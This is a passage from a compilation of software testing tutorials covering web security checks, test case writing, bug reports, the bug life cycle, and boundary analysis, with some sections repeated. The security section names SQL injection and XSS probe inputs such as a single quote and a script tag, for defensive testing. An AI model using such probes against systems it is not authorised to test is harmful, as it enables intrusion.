Via HTTP GET request user information is passed to server for authentication or fetching
data. Attacker can manipulate every input variable passed from this GET request to server
in order to get the required information or to corrupt the data. In such conditions any
unusual behavior by application or web server is the doorway for the attacker to get into the
application.

3. SQL Injection:
The next thing that should be checked is SQL injection. Entering a single quote (‘) in any
textbox should be rejected by the application. Instead, if the tester encounters a database
error, it means that the user input is inserted in some query which is then executed by the
application. In such a case, the application is vulnerable to SQL injection.

SQL injection attacks are very critical as attacker can get vital information from server
database. To check SQL injection entry points into your web application, find out code from
your code base where direct MySQL queries are executed on database by accepting some
user inputs.

If user input data is crafted in SQL queries to query the database, attacker can inject SQL
statements or part of SQL statements as user inputs to extract vital information from
database. Even if attacker is successful to crash the application, from the SQL query error
shown on browser, attacker can get the information they are looking for. Special characters
from user inputs should be handled/escaped properly in such cases.

4. Cross Site Scripting (XSS):


The tester should additionally check the web application for XSS (Cross site scripting). Any
HTML e.g. <HTML> or any script e.g. <SCRIPT> should not be accepted by the application.
If it is, the application can be prone to an attack by Cross Site Scripting.

Attacker can use this method to execute malicious script or URL on victim’s browser. Using
cross-site scripting, attacker can use scripts like JavaScript to steal user cookies and
information stored in the cookies.

Many web applications get some user information and pass this information in some
variables from different pages.

E.g.: http://www.examplesite.com/index.php?userid=123&query=xyz

Attacker can easily pass some malicious input or <script> as a ‘&query’ parameter which
can explore important user/server data on browser.

Important: During security testing, the tester should be very careful not to modify any of
the following:
• Configuration of the application or the server
• Services running on the server
• Existing user or customer data hosted by the application
Additionally, a security test should be avoided on a production system.

The purpose of the security test is to discover the vulnerabilities of the web application so
that the developers can then remove these vulnerabilities from the application and make
the web application and data safe from unauthorized actions.

Web Testing, Example Test cases

WEB TESTING
While testing a web application you need to consider following Cases:

• Functionality Testing
• Performance Testing
• Usability Testing
• Server Side Interface
• Client Side Compatibility
• Security
Functionality:
In testing the functionality of the web sites the following should be tested:
• Links
i. Internal Links
ii. External Links
iii. Mail Links
iv. Broken Links
• Forms
i. Field validation
ii. Error message for wrong input
iii. Optional and Mandatory fields
• Database
* Testing will be done on the database integrity.
• Cookies
* Testing will be done on the client system side, on the temporary Internet files.
Performance :
Performance testing can be applied to understand the web site’s scalability, or to benchmark
the performance in the environment of third party products such as servers and middleware
for potential purchase.
• Connection Speed:
Tested over various networks like Dial Up, ISDN etc
• Load:
i. What is the no. of users per time?
ii. Check for peak loads and how system behaves
iii. Large amount of data accessed by user
• Stress:
i. Continuous Load
ii. Performance of memory, CPU, file handling etc..
Usability:
Usability testing is the process by which the human-computer interaction characteristics of a
system are measured, and weaknesses are identified for correction.
• Ease of learning
• Navigation
• Subjective user satisfaction
• General appearance
Server Side Interface:
In web testing the server side interface should be tested. This is done by verify that
communication is done properly. Compatibility of server with software, hardware, network
and database should be tested.
Client Side Compatibility:
The client side compatibility is also tested in various platforms, using various browsers etc.
Security:
The primary reason for testing the security of a web is to identify potential vulnerabilities
and subsequently repair them.
• Network Scanning
• Vulnerability Scanning
• Password Cracking
• Log Review
• Integrity Checkers
• Virus Detection

How to write effective Test cases, procedures and


definitions

Writing effective test casesis a skill and that can be achieved by some experience and in-
depth study of the application on which test cases are being written.
Here I will share some tips on how to write test cases, test case procedures and
some basic test case definitions.
What is a test case?
“A test case has components that describes an input, action or event and an expected
response, to determine if a feature of an application is working correctly.” Definition
by Glossary
There are levels in which each test case will fall in order to avoid duplication efforts.
Level 1: In this level you will write the basic test cases from the available
specification and user documentation.
Level 2: This is the practical stage in which writing test cases depend on actual functional
and system flow of the application.
Level 3: This is the stage in which you will group some test cases and write a test
procedure. Test procedure is nothing but a group of small test cases maximum of 10.
Level 4: Automation of the project. This will minimize human interaction with system
and thus QA can focus on current updated functionalities to test rather than remaining busy
with regression testing.
So you can observe a systematic growth from no testable item to a Automation suit.

Why we write test cases?


The basic objective of writing test cases is to validate the testing coverage of the
application. If you are working in any CMMi company then you will strictly follow test cases
standards. So writing test cases brings some sort of standardization and minimizes the ad-
hoc approach in testing.
How to write test cases?
Here is a simple test case format
Fields in test cases:
Test case id:
Unit to test: What to be verified?
Assumptions:
Test data: Variables and their values
Steps to be executed:
Expected result:
Actual result:
Pass/Fail:
Comments:
So here is a basic format of test case statement:

Verify
Using [tool name, tag name, dialog, etc]
With [conditions]
To [what is returned, shown, demonstrated]
Verify: Used as the first word of the test case statement.
Using: To identify what is being tested. You can use ‘entering’ or ‘selecting’ here instead of
using depending on the situation.
For any application basically you will cover all the types of test cases including
functional, negative and boundary value test cases.
Keep in mind while writing test cases that all your test cases should be simple and easy
to understand. Don’t write explanations like essays. Be to the point.
Try writing the simple test cases as mentioned in above test case format.
Generally I use Excel sheets to write the basic test cases. Use any tool like ‘Test
Director’ when you are going to automate those test cases.

How to write a good bug report? Tips and Tricks


Why good Bug report?
If your bug report is effective, chances are higher that it will get fixed. So fixing a bug
depends on how effectively you report it. Reporting a bug is nothing but a skill and I will tell
you how to achieve this skill.
“The point of writing problem report(bug report) is to get bugs fixed” – By Cem
Kaner. If tester is not reporting bug correctly, programmer will most likely reject this bug
stating as irreproducible. This can hurt testers moral and some time ego also. (I suggest do
not keep any type of ego. Ego’s like “I have reported bug correctly”, “I can reproduce it”,
“Why he/she has rejected the bug?”, “It’s not my fault” etc etc..)
What are the qualities of a good software bug report?
Anyone can write a bug report. But not everyone can write a effective bug report. You
should be able to distinguish between average bug report and a good bug report. How to
distinguish a good or bad bug report? It’s simple, apply following characteristics and
techniques to report a bug.
1) Having clearly specified bug number:
Always assign a unique number to each bug report. This will help to identify the bug record.
If you are using any automated bug-reporting tool then this unique number will be
generated automatically each time you report the bug. Note the number and brief
description of each bug you reported.
2) Reproducible:
If your bug is not reproducible it will never get fixed. You should clearly mention the steps
to reproduce the bug. Do not assume or skip any reproducing step. Step by step described
bug problem is easy to reproduce and fix.
3) Be Specific:
Do not write a essay about the problem. Be Specific and to the point. Try to summarize the
problem in minimum words yet in effective way. Do not combine multiple problems even
they seem to be similar. Write different reports for each problem.
How to Report a Bug?
Use following simple Bug report template:
This is a simple bug report format. It may vary on the bug report tool you are using. If you
are writing bug report manually then some fields need to specifically mention like Bug
number which should be assigned manually.
Reporter: Your name and email address.
Product: In which product you found this bug.
Version: The product version if any.
Component: These are the major sub modules of the product.
Platform: Mention the hardware platform where you found this bug. The various platforms
like ‘PC’, ‘MAC’, ‘HP’, ‘Sun’ etc.
Operating system: Mention all operating systems where you found the bug. Operating
systems like Windows, Linux, Unix, SunOS, Mac OS. Mention the different OS versions also
if applicable like Windows NT, Windows 2000, Windows XP etc.
Priority:
When bug should be fixed? Priority is generally set from P1 to P5. P1 as “fix the bug with
highest priority” and P5 as ” Fix when time permits”.
Severity:
This describes the impact of the bug.
Types of Severity:
• Blocker: No further testing work can be done.
• Critical: Application crash, Loss of data.
• Major: Major loss of function.
• Minor: minor loss of function.
• Trivial: Some UI enhancements.
• Enhancement: Request for new feature or some enhancement in existing one.
Status:
When you are logging the bug in any bug tracking system then by default the bug status is
‘New’.
Later on bug goes through various stages like Fixed, Verified, Reopen, Won’t Fix etc.
Click here to read more about detail bug life cycle.
Assign To:
If you know which developer is responsible for that particular module in which bug occurred,
then you can specify email address of that developer. Else keep it blank this will assign bug
to module owner or Manger will assign bug to developer. Possibly add the manager email
address in CC list.
URL:
The page url on which bug occurred.
Summary:
A brief summary of the bug mostly in 60 or below words. Make sure your summary is
reflecting what the problem is and where it is.
Description:
A detailed description of bug. Use following fields for description field:
• Reproduce steps: Clearly mention the steps to reproduce the bug.
• Expected result: How application should behave on above mentioned steps.
• Actual result: What is the actual result on running above steps i.e. the bug
behavior.
These are the important steps in bug report. You can also add the “Report type” as one
more field which will describe the bug type.

The report types are typically:


1) Coding error
2) Design error
3) New suggestion
4) Documentation issue
5) Hardware problem
Some Bonus tips to write a good bug report:
1) Report the problem immediately:If you found any bug while testing, do not wait to
write detail bug report later. Instead write the bug report immediately. This will ensure a
good and reproducible bug report. If you decide to write the bug report later on then
chances are high to miss the important steps in your report.
2) Reproduce the bug three times before writing bug report:Your bug should be
reproducible. Make sure your steps are robust enough to reproduce the bug without any
ambiguity. If your bug is not reproducible every time you can still file a bug mentioning the
periodic nature of the bug.
3) Test the same bug occurrence on other similar module:
Sometimes developer use same code for different similar modules. So chances are high that
bug in one module can occur in other similar modules as well. Even you can try to find more
severe version of the bug you found.
4) Write a good bug summary:
Bug summary will help developers to quickly analyze the bug nature. Poor quality report will
unnecessarily increase the development and testing time. Communicate well through your
bug report summary. Keep in mind bug summary is used as a reference to search the bug
in bug inventory.
5) Read bug report before hitting Submit button:
Read all sentences, wording, steps used in bug report. See if any sentence is creating
ambiguity that can lead to misinterpretation. Misleading words or sentences should be
avoided in order to have a clear bug report.
6) Do not use Abusive language:
It’s nice that you did a good work and found a bug but do not use this credit for criticizing
developer or to attack any individual.
Conclusion:
No doubt that your bug report should be a high quality document. Focus on writing good
bug reports, spend some time on this task because this is main communication point
between tester, developer and manager. Mangers should make aware to their team that
writing a good bug report is primary responsibility of any tester. Your efforts towards writing
good bug report will not only save company resources but also create a good relationship
between you and developers.
Sample bug report
This is the guest post from Vijay D (Coincidence with my name).
Below sample bug/defect report will give you exact idea of how to report a bug in bug
tracking tool.
Here is the example scenario that caused a bug:
Lets assume in your application under test you want to create a new user with user
information, for that you need to logon into the application and navigate to USERS menu >
New User, then enter all the details in the ‘User form’ like, First Name, Last Name, Age,
Address, Phone etc. Once you enter all these information, you need to click on ‘SAVE’
button in order to save the user. Now you can see a success message saying, “New User
has been created successfully”.

But when you entered into your application by logging in and navigated to USERS menu >
New user, entered all the required information to create new user and clicked on SAVE
button. BANG! The application crashed and you got one error page on screen. (Capture this
error message window and save as a Microsoft paint file)

Now this is the bug scenario and you would like to report this as a BUG in your bug-
tracking tool.
How will you report this bug effectively?
Here is the sample bug report for above mentioned example:
(Note that some ‘bug report’ fields might differ depending on your bug tracking system)
SAMPLE BUG REPORT:
Bug Name: Application crash on clicking the SAVE button while creating a new user.
Bug ID: (It will be automatically created by the BUG Tracking tool once you save this bug)
Area Path: USERS menu > New Users
Build Number: Version Number 5.0.1
Severity: HIGH (High/Medium/Low) or 1
Priority: HIGH (High/Medium/Low) or 1
Assigned to: Developer-X
Reported By: Your Name
Reported On: Date
Reason: Defect
Status: New/Open/Active (Depends on the Tool you are using)
Environment: Windows 2003/SQL Server 2005
Description:
Application crash on clicking the SAVE button while creating a new
user, hence unable to create a new user in the application.
Steps To Reproduce:
1) Logon into the application
2) Navigate to the Users Menu > New User
3) Filled all the user information fields
4) Clicked on ‘Save’ button
5) Seen an error page “ORA1090 Exception: Insert values Error…”
6) See the attached logs for more information (Attach more logs related to bug..IF any)
7) And also see the attached screenshot of the error page.
Expected result: On clicking SAVE button, should be prompted to a success message “New
User has been created successfully”.
(Attach ‘application crash’ screen shot.. IF any)

Save the defect/bug in the BUG TRACKING TOOL. You will get a bug id, which you can use
for further bug reference.
Default ‘New bug’ mail will go to respective developer and the default module owner (Team
leader or manager) for further action.
Related: If you need more information about writing a good bug report read our previous
post “How to write a good bug report“.
122 Comments

How to write a good bug report? Tips and Tricks


September 18th, 2007 — Bug Defect tracking, How to be a good tester,Software Testing Templates

Why good Bug report?


If your bug report is effective, chances are higher that it will get fixed. So fixing a bug
depends on how effectively you report it. Reporting a bug is nothing but a skill and I will tell
you how to achieve this skill.
“The point of writing problem report(bug report) is to get bugs fixed” – By Cem
Kaner. If tester is not reporting bug correctly, programmer will most likely reject this bug
stating as irreproducible. This can hurt testers moral and some time ego also. (I suggest do
not keep any type of ego. Ego’s like “I have reported bug correctly”, “I can reproduce it”,
“Why he/she has rejected the bug?”, “It’s not my fault” etc etc..)
What are the qualities of a good software bug report?
Anyone can write a bug report. But not everyone can write a effective bug report. You
should be able to distinguish between average bug report and a good bug report. How to
distinguish a good or bad bug report? It’s simple, apply following characteristics and
techniques to report a bug.
1) Having clearly specified bug number:
Always assign a unique number to each bug report. This will help to identify the bug record.
If you are using any automated bug-reporting tool then this unique number will be
generated automatically each time you report the bug. Note the number and brief
description of each bug you reported.
2) Reproducible:
If your bug is not reproducible it will never get fixed. You should clearly mention the steps
to reproduce the bug. Do not assume or skip any reproducing step. Step by step described
bug problem is easy to reproduce and fix.
3) Be Specific:
Do not write a essay about the problem. Be Specific and to the point. Try to summarize the
problem in minimum words yet in effective way. Do not combine multiple problems even
they seem to be similar. Write different reports for each problem.
How to Report a Bug?
Use following simple Bug report template:
This is a simple bug report format. It may vary on the bug report tool you are using. If you
are writing bug report manually then some fields need to specifically mention like Bug
number which should be assigned manually.
Reporter: Your name and email address.
Product: In which product you found this bug.
Version: The product version if any.
Component: These are the major sub modules of the product.
Platform: Mention the hardware platform where you found this bug. The various platforms
like ‘PC’, ‘MAC’, ‘HP’, ‘Sun’ etc.
Operating system: Mention all operating systems where you found the bug. Operating
systems like Windows, Linux, Unix, SunOS, Mac OS. Mention the different OS versions also
if applicable like Windows NT, Windows 2000, Windows XP etc.
Priority:
When bug should be fixed? Priority is generally set from P1 to P5. P1 as “fix the bug with
highest priority” and P5 as ” Fix when time permits”.
Severity:
This describes the impact of the bug.
Types of Severity:
• Blocker: No further testing work can be done.
• Critical: Application crash, Loss of data.
• Major: Major loss of function.
• Minor: minor loss of function.
• Trivial: Some UI enhancements.
• Enhancement: Request for new feature or some enhancement in existing one.
Status:
When you are logging the bug in any bug tracking system then by default the bug status is
‘New’.
Later on bug goes through various stages like Fixed, Verified, Reopen, Won’t Fix etc.
Click here to read more about detail bug life cycle.
Assign To:
If you know which developer is responsible for that particular module in which bug occurred,
then you can specify email address of that developer. Else keep it blank this will assign bug
to module owner or Manger will assign bug to developer. Possibly add the manager email
address in CC list.
URL:
The page url on which bug occurred.
Summary:
A brief summary of the bug mostly in 60 or below words. Make sure your summary is
reflecting what the problem is and where it is.
Description:
A detailed description of bug. Use following fields for description field:
• Reproduce steps: Clearly mention the steps to reproduce the bug.
• Expected result: How application should behave on above mentioned steps.
• Actual result: What is the actual result on running above steps i.e. the bug
behavior.
These are the important steps in bug report. You can also add the “Report type” as one
more field which will describe the bug type.
The report types are typically:
1) Coding error
2) Design error
3) New suggestion
4) Documentation issue
5) Hardware problem
Some Bonus tips to write a good bug report:
1) Report the problem immediately:If you found any bug while testing, do not wait to
write detail bug report later. Instead write the bug report immediately. This will ensure a
good and reproducible bug report. If you decide to write the bug report later on then
chances are high to miss the important steps in your report.
2) Reproduce the bug three times before writing bug report:Your bug should be
reproducible. Make sure your steps are robust enough to reproduce the bug without any
ambiguity. If your bug is not reproducible every time you can still file a bug mentioning the
periodic nature of the bug.
3) Test the same bug occurrence on other similar module:
Sometimes developer use same code for different similar modules. So chances are high that
bug in one module can occur in other similar modules as well. Even you can try to find more
severe version of the bug you found.
4) Write a good bug summary:
Bug summary will help developers to quickly analyze the bug nature. Poor quality report will
unnecessarily increase the development and testing time. Communicate well through your
bug report summary. Keep in mind bug summary is used as a reference to search the bug
in bug inventory.
5) Read bug report before hitting Submit button:
Read all sentences, wording, steps used in bug report. See if any sentence is creating
ambiguity that can lead to misinterpretation. Misleading words or sentences should be
avoided in order to have a clear bug report.
6) Do not use Abusive language:
It’s nice that you did a good work and found a bug but do not use this credit for criticizing
developer or to attack any individual.
Conclusion:
No doubt that your bug report should be a high quality document. Focus on writing good
bug reports, spend some time on this task because this is main communication point
between tester, developer and manager. Mangers should make aware to their team that
writing a good bug report is primary responsibility of any tester. Your efforts towards writing
good bug report will not only save company resources but also create a good relationship
between you and developers.

Bug life cycle


What is Bug/Defect?
Simple Wikipedia definition of Bug is: “A computer bug is an error, flaw, mistake,
failure, or fault in a computer program that prevents it from working correctly or produces
an incorrect result. Bugs arise from mistakes and errors, made by people, in either a
program’s source code or its design.”
Other definitions can be:
An unwanted and unintended property of a program or piece of hardware, especially one
that causes it to malfunction.
or
A fault in a program, which causes the program to perform in an unintended or
unanticipated manner.
Lastly the general definition of bug is: “failure to conform to specifications”.

If you want to detect and resolve the defect in early development stage, defect tracking and
software development phases should start simultaneously.

We will discuss more on Writing effective bug report in another article. Let’s concentrate
here on bug/defect life cycle.

Life cycle of Bug:


1) Log new defect
When tester logs any new bug the mandatory fields are:
Build version, Submit On, Product, Module, Severity, Synopsis and Description to Reproduce
In above list you can add some optional fields if you are using manual Bug submission
template:
These Optional Fields are: Customer name, Browser, Operating system, File Attachments or
screenshots.
The following fields remain either specified or blank:
If you have authority to add bug Status, Priority and ‘Assigned to’ fields them you can
specify these fields. Otherwise Test manager will set status, Bug priority and assign the bug
to respective module owner.
Look at the following Bug life cycle:
[Click on the image to view full size] Ref: Bugzilla bug life cycle

The figure is quite complicated but when you consider the significant steps in bug life cycle
you will get quick idea of bug life.

On successful logging the bug is reviewed by Development or Test manager. Test manager
can set the bug status as Open, can Assign the bug to developer or bug may be deferred
until next release.

When bug gets assigned to developer and can start working on it. Developer can set bug
status as won’t fix, Couldn’t reproduce, Need more information or ‘Fixed’.

If the bug status set by developer is either ‘Need more info’ or Fixed then QA responds with
specific action. If bug is fixed then QA verifies the bug and can set the bug status as verified
closed or Reopen.

Bug status description:


These are various stages of bug life cycle. The status caption may vary depending on the
bug tracking system you are using.
1) New: When QA files new bug.
2) Deferred: If the bug is not related to current build or can not be fixed in this release or
bug is not important to fix immediately then the project manager can set the bug status as
deferred.
3) Assigned: ‘Assigned to’ field is set by project lead or manager and assigns bug to
developer.
4) Resolved/Fixed: When developer makes necessary code changes and verifies the
changes then he/she can make bug status as ‘Fixed’ and the bug is passed to testing team.
5) Could not reproduce: If developer is not able to reproduce the bug by the steps given
in bug report by QA then developer can mark the bug as ‘CNR’. QA needs action to check if
bug is reproduced and can assign to developer with detailed reproducing steps.
6) Need more information: If developer is not clear about the bug reproduce steps
provided by QA to reproduce the bug, then he/she can mark it as “Need more information’.
In this case QA needs to add detailed reproducing steps and assign bug back to dev for fix.
7) Reopen: If QA is not satisfy with the fix and if bug is still reproducible even after fix then
QA can mark it as ‘Reopen’ so that developer can take appropriate action.
8 ) Closed: If bug is verified by the QA team and if the fix is ok and problem is solved then
QA can mark bug as ‘Closed’.
9) Rejected/Invalid: Some times developer or team lead can mark the bug as Rejected or
invalid if the system is working according to specifications and bug is just due to some
misinterpretation.

What is actual testing process in practical or


company environment?
Today I got interesting question from reader, How testing is carried out in company i.e
in practical environment? Those who get just out of college and start for searching the
jobs have this curiosity, How would be the actual working environment in the companies?
Here I focus on software Testing actual working process in the companies. As of now
I got good experience ofsoftware testing career and day to day testing activities. So I will
try to share more practically rather than theoretically.
Whenever we get any new project there is initial project familiarity meeting. In this meeting
we basically discuss on who is client? what is project duration and when is delivery? Who is
involved in project i.e manager, Tech leads, QA leads, developers, testers etc etc..?

From the SRS (software requirement specification) project plan is developed. The
responsibility of testers is to create software test plan from this SRS and project plan.
Developers start coding from the design. The project work is devided into different modules
and these project modules are distributed among the developers. In meantime testers
responsibility is to create test scenario and write test casesaccording to assigned modules.
We try to cover almost all the functional test cases from SRS. The data can be maintained
manually in some excel test case templates or bug tracking tools.
When developers finish individual modules, those modules are assigned to testers. Smoke
testing is performed on these modules and if they fail this test, modules are reassigned to
respective developers for fix. For passed modules manual testing is carried out from the
written test cases. If any bug is found that get assigned to module developer and get
logged in bug tracking tool. On bug fix tester do bug verification and regression testing of all
related modules. If bug passes the verification it is marked as verified and marked as
closed. Otherwise above mentioned bug cycle gets repeated.(I will cover bug life cycle in
other post)
Different tests are performed on individual modules and integration testing on module
integration. These tests includes Compatibility testing i.e testing application on different
hardware, OS versions, software platform, different browsers etc. Load and stress testing is
also carried out according to SRS. Finally system testing is performed by creating virtual
client environment. On passing all the test cases test report is prepared and decision is
taken to release the product!
So this was a brief outline of process of project life cycle.

Here is detail of each step what testing exactly carried out in each software
quality and testing life cycle specified by IEEE and ISO standards:
Review of the software requirement specifications
Objectives is set for the Major releases
Target Date planned for the Releases
Detailed Project Plan is build. This includes the decision on Design Specifications
Develop Test Plan based on Design Specifications
Test Plan : This includes Objectives, Methodology adopted while testing, Features to
be tested and not to be tested, risk criteria, testing schedule, multi-
platform support and the resource allocation for testing.
Test Specifications
This document includes technical details ( Software requirements )
required prior to the testing.
Writing of Test Cases
Smoke(BVT) test cases
Sanity Test cases
Regression Test Cases
Negative Test Cases
Extended Test Cases
Development – Modules developed one by one
Installers Binding: Installers are build around the individual product.
Build procedure :
A build includes Installers of the available products – multiple platforms.
Testing
Smoke Test (BVT) Basic application test to take decision on further testing
Testing of new features
Cross-platform testing
Stress testing and memory leakage testing.
Bug Reporting
Bug report is created
Development – Code freezing
No more new features are added at this point.
Testing
Builds and regression testing.
Decision to release the product
Post-release Scenario for further objectives.
Smoke testing and sanity testing – Quick and
simple differences
Despite of hundreds of web articles on Smoke and sanity testing, many people still have
confusion between these terms and keep on asking to me. Here is a simple and
understandable difference that can clear your confusion between smoke testing and
sanity testing.
Here are the differences you can see:
SMOKE TESTING:
• Smoke testing originated in the hardware testing practice of turning on a new piece
of hardware for the first time and considering it a success if it does not catch fire and
smoke. In software industry, smoke testing is a shallow and wide approach whereby
all areas of the application without getting into too deep, is tested.
• A smoke test is scripted, either using a written set of tests or an automated test
• A Smoke test is designed to touch every part of the application in a cursory way. It’s
shallow and wide.
• Smoke testing is conducted to ensure whether the most crucial functions of a
program are working, but not bothering with finer details. (Such as build
verification).
• Smoke testing is normal health check up to a build of an application before taking it
to testing in depth.
SANITY TESTING:
• A sanity test is a narrow regression test that focuses on one or a few areas of
functionality. Sanity testing is usually narrow and deep.
• A sanity test is usually unscripted.
• A Sanity test is used to determine a small section of the application is still working
after a minor change.
• Sanity testing is a cursory testing, it is performed whenever a cursory testing is
sufficient to prove the application is functioning according to specifications. This level
of testing is a subset of regression testing.
• Sanity testing is to verify whether requirements are met or not, checking all features
breadth-first.
Hope these points will help you to clearly understand the Smoke and sanity tests and will
help to remove any confusion.

Thanks to VijayD for answering this question in simple way for our readers.
If you have more points on smoke and sanity testing to elaborate on, please comment
below.
What is Boundary value analysis and Equivalence
partitioning?
Boundary value analysis and Equivalence partitioning, explained with simple
example:
Boundary value analysis and equivalence partitioning both are test case design strategies in
black box testing.

Equivalence Partitioning:
In this method the input domain data is divided into different equivalence data classes. This
method is typically used to reduce the total number of test cases to a finite set of
testable test cases, still covering maximum requirements.
In short it is the process of taking all possible test cases and placing them into classes. One
test value is picked from each class while testing.
E.g.: If you are testing for an input box accepting numbers from 1 to 1000 then there is no
use in writing thousand test cases for all 1000 valid input numbers plus other test cases for
invalid data.
Using equivalence partitioning method above test cases can be divided into three sets of
input data called as classes. Each test case is a representative of respective class.

So in above example we can divide our test cases into three equivalence classes of some
valid and invalid inputs.

Test cases for input box accepting numbers between 1 and 1000 using Equivalence
Partitioning:
1) One input data class with all valid inputs. Pick a single value from range 1 to 1000 as a
valid test case. If you select other values between 1 and 1000 then result is going to be
same. So one test case for valid input data should be sufficient.
2) Input data class with all values below lower limit. I.e. any value below 1, as a invalid
input data test case.
3) Input data with any value greater than 1000 to represent third invalid input class.
So using equivalence partitioning you have categorized all possible test cases into three
classes. Test cases with other values from any class should give you the same result.

We have selected one representative from every input class to design our test cases. Test
case values are selected in such a way that largest number of attributes of equivalence class
can be exercised.

Equivalence partitioning uses fewest test cases to cover maximum requirements.


Boundary value analysis:
It’s widely recognized that input values at the extreme ends of input domain cause more
errors in system. More application errors occur at the boundaries of input domain.
‘Boundary value analysis’ testing technique is used to identify errors at boundaries rather
than finding those exist in center of input domain.
Boundary value analysis is a next part of Equivalence partitioning for designing test cases
where test cases are selected at the edges of the equivalence classes.

Test cases for input box accepting numbers between 1 and 1000 using Boundary
value analysis:
1) Test cases with test data exactly as the input boundaries of input domain i.e. values 1
and 1000 in our case.
2) Test data with values just below the extreme edges of input domains i.e. values 0 and
999.
3) Test data with values just above the extreme edges of input domain i.e. values 2 and
1001.
Boundary value analysis is often called as a part of stress and negative testing.

Note: There is no hard-and-fast rule to test only one value from each equivalence class you
created for input domains. You can select multiple valid and invalid values from each
equivalence class according to your needs and previous judgments.
E.g. if you divided 1 to 1000 input values in valid data equivalence class, then you can
select test case values like: 1, 11, 100, 950 etc. Same case for other test cases having
invalid data classes.
This should be a very basic and simple example to understand the Boundary value analysis
and Equivalence partitioning concept.

18 Tips to Handle Any Job Interview Successfully


This is a guest article by Megha S. – A Career Counselor.
Interviews have always been a nerve racking experience. A situation where you are judged
on your performance for a job. Everybody gets the jitters when it comes to interviews.
Relax! Don’t panic. You need to overcome the nervousness.
Job Interview Tips and advice Applicable for Any Job Seeker Looking for a Dream
Job.

No matter which career path you want to choose below are the best tips to help you land
your dream job.

1. Always do your homework well before walking into an interview. Make sure you have
complete knowledge about the company and the role.
2. Know yourself. Remember first impression is the last impression. Demonstrate your
capabilities and qualities and how well you can serve them. Don’t be overconfident and
aggressive.

3. You should know your competency and transferable skills. Competency skills are the
skills matching your job profile and transferable skills which you acquired through other
jobs, personal activities.
4. Social networking sites like Facebook, Orkut, Linkedin can be used for work
opportunities and conversing with other people improving your interpersonal skills.
5. Be clear about what you want to achieve in life and about your career objective. It will
keep you focused. You don’t have to do anything for the heck of it.
6. Your CV is vital for a successful interview. Never bluff, include all your skills and
experience to give you a competitive edge.
7. Prepare well for an interview. You can make notes of interview questions which are most
likely to be asked. Practice your answers.This will boost your confidence.
8. Work on your communication skills. Remember having a good technical knowledge
without effective interpersonal skills will not take you anywhere. Be expressive and a good
conversationalist. Dazzle the interviewers with eloquent speech.
9. Make sure you can support your strengths by giving examples. You can prepare
before but don’t falter while talking. It will not create a good impression.
10. When asked about your weaknesses acknowledge them. If you are not able to
describe, it signifies that you lack self awareness. You can’t be perfect in everything.
11. Always be presentable while dressing for the interview. Your attire should be
according to the role, culture and yourself. Please no tacky and brash clothing and
accessories. You don’t need to be glammed up.
12. Spend time on personal grooming. This will keep you calm. You don’t have to present
yourself as a person full of nervous energy and fidgets.
13. On the D day, relax. Be comfortable and wear a smile. And Voila! You will definitely
crack the interview.
14. Your body language is very important. Your facial expressions, hand movements,
posture, voice and pace should send the same message.
15. Don’t forget to make an eye contact. Your voice should be enthusiastic and do not
stammer. Lack of enthusiasm will put off the interviewers.
16. Keep all your documents well organized in a folder. Also be on time, preferably 15
minutes before so you get time to settle down and calm your nerves.
17. Interview manners are very important. Bad manners will definitely be a turn off.
Don’t bang the door, shake handily firmly, ask if you can take a seat, sit up straight and do
not slouch.
18. When asked about remuneration. You don’t have to be blunt. Instead you can say that
you expect a fair raise in terms of qualifications and experience proportionate with peers.
Now that you have some good interview tips. Be confident, gear up and don’t let
yourself down. Remember this is not the end of life if you don’t get through to the process.
It’s just an interview. Good Luck!
Preparing For Software Testing Interview –
Simple Tips To Follow Prior And at The Time of
Interview
As Software testers, we keep performing testing activities in various phases of a project.
When it comes to testing our own skills, we may not end up choosing an appropriate
approach. I am talking about how the interview rounds go and how to face them. The whole
article is a very general discussion about the challenges that a tester has to face in an
interview.

Let’s start with preparing a CV for software testing job profile.


How to prepare a good CV?
By the term ‘Good’ I mean a CV that describes best about your skills, your expertise, your
strengths etc. It’s better not to use a same CV for different types of job profiles. Making
slight changes will help to get a call. For e.g. you can highlight the skill set that you posses
for the required job like any automation tool or experience in other related automation
tools. You can also add about the basic knowledge of any technologies that you posses. This
may be an added advantage.
Preparation before the job interview:
Before attending the interview, check the job profile in detail. Understand if the requirement
is purely in manual testing, Automation testing or on both. Check if your job profile
experience match with what is expected.
The interviewer will mostly stick to questions around the given job profile and what you
have mentioned in your CV. Make sure you can answer questions confidently which are
based on your CV. It depends on how the discussion goes between the candidate and the
interviewer, which leads to discussion in other areas.
Appear confidently at the time of interview:
In most cases, the interview starts with a brief up about the candidate. One can answer to
this question by following a sequence like starting with your Name, what qualifications do
you posses, how you started your career as a software tester etc. Some interviewers do not
like to hear about personal details like family. So do not proceed with these details unless
the interviewer asks for it.
While answering any question tell what you know. Do not try to explain about ideal cases.
Interviewers are interested in practical approach, rather than ideal cases. Tell the
interviewer how you will go about solving the problems or about your way of tackling things.
Do not talk anything negative about any person especially about developers/programmers.
If you do so, then it shows that you are not mature enough. Now a days in most of the
interviews, scenarios are cited rather than direct question and answer. If the scenario is
new to you, take few seconds to think on it and then answer. Do not hurry up things.

The way you present in interviews is very important. Right attitude is very important too.
Many managers can judge it easily, if you have really worked on projects or it’s just a fake
experience. The confidence level with which you answer makes a strong impression. For any
question if you are not sure about the correct answer, just make an attempt. Do not just
give up. You can also talk about things that you explored in free time or with your interest.
This shows that you take initiative and are a continuous learner as well.

As many of us must have experienced that the interviewers keep asking about the
processes that you have followed or are familiar with. One does not need to worry if they
have never followed any processes. Following the processes is up to the company and a
tester cannot do much regarding that. But of course one can follow some processes for
his/her own task (I mean the modules that you own or are in charge of etc). This will not
only help to manage things but also inspires other to follow some processes. Any process,
which has proven some good results, can be followed. So, instead of blaming others for not
following any processes, one can take an initiative to do it. Do not forget that Initiative is
one of the qualities that a tester should possess.

One more important point: It’s not necessary that the person who is taking your
interview is a person from QA background. A person from developing background can also
take software testing job interviews. What I mean to say is the person need not have
actually worked on the QA processes. In such case it becomes very important to answer the
questions very carefully. It may sound illogical when a person from non-QA background
interviews a tester but remember it will be a very good experience as you will get to know
how testing is perceived by others.
Over to You:
What’s your experience about software testing interviews? If you want to share some do’s
and don’ts please make comments below so that other testers can get benefit from your
experience. And finally ‘all the best’ for your testing career!

ISTQB question pattern and tips to solve


Please welcome ‘Sandhya’ on softwaretestinghelp.com writer’s board. Sandhya is having
extensive experience in software testing field and helping many software testers in clearing
the testing certification exams like ISTQB.

Sandhya will be giving youISTQB paper pattern and tips on how to solve the
questions quickly. To start with, here are 10 sample ISTQB ‘Foundation level’ questions
with detailed explanation for answers.
ISTQB question pattern and tips to solve:
ISTQB questions are formatted in such a way that the answers look very much similar.
